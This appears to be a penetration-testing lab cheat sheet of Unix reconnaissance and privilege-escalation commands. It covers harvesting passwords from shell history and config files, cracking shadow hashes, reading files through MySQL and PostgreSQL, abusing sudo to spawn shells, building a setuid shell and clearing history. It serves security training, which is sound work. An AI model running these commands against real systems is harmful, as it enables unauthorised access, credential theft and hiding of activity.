Unix/Linux Security: Essential Commands and Privilege Escalation Techniques

Essential Unix Commands

Quickly gather system information:

• Check logged-in users: w
• List running processes: ps -edf
• View command history: history or fc -l
• Clear command history: history -c or fc -l -p
• Disk usage: df -H
• Memory usage: free -m
• CPU and process monitor: top
• Clear terminal: Ctrl + L
• End file input (in cat > file.txt): Ctrl + D
• Suspend a process: Ctrl + Z

Reconnaissance Hints

• If a user's home directory is missing from /home, check /etc/passwd for the correct path.
• Search user history files for accidental password exposure:

find /home -name .bash_history -exec grep -A 1 passwd {} \;

This finds cases where users typed their password directly into the shell instead of a password prompt.

Extracting Backup Files

Root may leave sensitive backups in temporary directories. Extract them using:

# .tgz file
tar zxvf backup.tgz

# .tbz or .tar.bz2 file
tar -xjf backup.tbz

# .bz2 file
bzip2 -d backup.bz2

Always check /tmp and /var/tmp for leftover files.

Analyze Cron Scripts and Configuration Files

If root runs a daily backup script via /etc/cron.daily/, it may contain hardcoded keys or use symmetric encryption. Extract readable strings:

strings /etc/cron.daily/backup-script.sh

This can reveal passwords, encryption keys, or API tokens.

Cracking Password Hashes from /etc/shadow

Use John the Ripper to crack hashes:

john --format=[FORMAT] shadow.txt

Identify hash types:

• $1$ -> MD5
• $2a$ or $2y$ -> Blowfish (bcrypt)
• $5$ -> SHA-256
• $6$ -> SHA-512

For MySQL SHA-1 hashes:

john --format=mysql-sha1 hashes.txt

Tomcat: Extract Admin Credentials

Tomcat admin credentials are often stored in:

/etc/tomcat*/tomcat-users.xml

Search and extract:

find /etc -name tomcat-users.xml -exec grep -A 1 admin {} \;

MySQL: Access and Extract Data

Connect as root (if no password is set):

mysql -u root

Common commands:

show databases;
use [DATABASE];
show tables;
select * from [TABLE];

To read files from the filesystem:

select load_file("/var/lib/mysql-files/key.txt");

If you find the MySQL user table (user.MYD), use strings to extract password hashes:

strings /var/lib/mysql/mysql/user.MYD | grep -A 1 root

PostgreSQL: Basic Commands

Connect to PostgreSQL:

psql

Useful commands:

• \list - List databases
• \c [DATABASE] - Connect to a database
• \d - List tables
• select * from users; - Query user table

Read Web Application Source Code

Web apps are typically located in /var/www. Inspect configuration files for database credentials:

cat /var/www/html/config.php

Once you have database access, you can read arbitrary files using:

CREATE TABLE demo(t text);
COPY demo FROM '/etc/passwd';
SELECT * FROM demo;

Privilege Escalation Techniques

Check what commands you can run as other users:

sudo -l

Example output:

User pentesterlab may run the following commands on server:
    (victim) /bin/bash

If allowed, gain a shell as victim:

sudo -u victim /bin/bash

Using find

sudo -u victim find / -name "key.txt" -exec cat {} \;

Using less

sudo -u victim less /home/victim/key.txt

Using awk

sudo -u victim awk '{print $0}' /home/victim/key.txt

Or spawn a shell:

sudo -u victim awk '{system("/bin/bash")}'

Using chmod and cp

If you can copy files and set permissions, create a SUID/GUID binary:

echo 'int main(){setgid(1001);setuid(1001);system("/bin/sh");}' > shell.c
gcc -o /tmp/shell shell.c
sudo -u victim cp /tmp/shell /home/victim/
chmod +sx /home/victim/shell
/home/victim/shell

Using perl

sudo -u victim perl -e 'print `cat /etc/passwd`'

Using node

sudo -u victim node -e "var exec = require('child_process').exec; exec('cat /home/victim/key.txt', function (error, stdout, stderr){console.log(stdout);});"

See Also